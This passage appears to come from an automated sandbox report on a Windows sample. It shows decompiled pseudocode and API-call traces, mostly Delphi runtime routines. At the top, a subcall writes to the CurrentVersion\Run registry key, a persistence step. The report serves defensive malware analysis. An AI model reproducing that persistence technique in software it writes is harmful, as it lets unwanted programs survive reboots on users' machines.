      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd

    Non-executed Functions